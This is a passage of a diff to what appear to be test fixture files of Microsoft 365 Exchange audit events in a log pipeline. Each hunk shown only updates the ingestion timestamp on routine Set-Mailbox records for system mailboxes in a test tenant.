bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1776,7 +1776,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853075900Z", + "ingested": "2021-12-14T14:49:28.056956179Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1857,7 +1857,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853081600Z", + "ingested": "2021-12-14T14:49:28.056956630Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1938,7 +1938,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853087900Z", + "ingested": "2021-12-14T14:49:28.056957179Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2019,7 +2019,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853093900Z", + "ingested": "2021-12-14T14:49:28.056957719Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2100,7 +2100,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853099700Z", + "ingested": "2021-12-14T14:49:28.056958391Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2181,7 +2181,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853105500Z", + "ingested": "2021-12-14T14:49:28.056959057Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2262,7 +2262,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853111300Z", + "ingested": "2021-12-14T14:49:28.056959554Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2345,7 +2345,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853117200Z", + "ingested": "2021-12-14T14:49:28.056960192Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2426,7 +2426,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853122900Z", + "ingested": "2021-12-14T14:49:28.056960943Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2507,7 +2507,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853127Z", + "ingested": "2021-12-14T14:49:28.056961475Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2588,7 +2588,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853130300Z", + "ingested": "2021-12-14T14:49:28.056961920Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
